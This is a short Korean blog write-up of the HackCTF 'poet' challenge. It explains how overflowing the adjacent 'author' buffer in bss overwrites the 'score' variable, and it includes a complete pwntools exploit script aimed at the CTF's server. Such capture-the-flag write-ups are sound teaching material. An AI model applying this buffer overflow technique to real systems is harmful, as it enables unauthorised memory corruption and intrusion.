poet
score은 제가 보기 편하게 변수명을 변경했습니다.
score 이 1000000 값일때 while문을 탈출해서 플래그를 출력하네요.
이 함수에서 score값을 증가시켜주실래 처음 접근한 방법은
ESPR를 10000번 입력해주는 건가 했죵.
하지만 이렇게 큰 값을 넣어주면 프로그램 터져용
그 다음으로 시도한 방법을 설명하겠습니다.
author score 두 변수가 같은 bss 영역에 있어요. offset을 구해 author에서 입력받은 값으로 score 값 변경까지 가면 됩니다.
offset = score주소-author주소 =0x6024e0-0x6024a0=0x40
-pwntools코드
|
#-*-coding:utf-8-*- from pwn import *
p=remote('ctf.j0n9hyun.xyz',3012) p.recvuntil('> ') payload='aa' p.sendline(payload) print p.recvuntil('이 시의 저자는 누구입니까?\n> ') payload='a'*0x40 payload+=p32(1000000)
p.sendline(payload) p.interactive() |
'Hacking > write-up' 카테고리의 다른 글
| (HackCTF)1996 (0) | 2020.09.10 |
|---|---|
| (HackCTF) random key (0) | 2020.09.08 |
| (HackCTF)rtl_world (0) | 2020.09.06 |
| (HackCTF) x64 Simple_size_BOF (0) | 2020.09.06 |
| (HackCTF) Simple_Overflow_ver_2 (0) | 2020.09.06 |
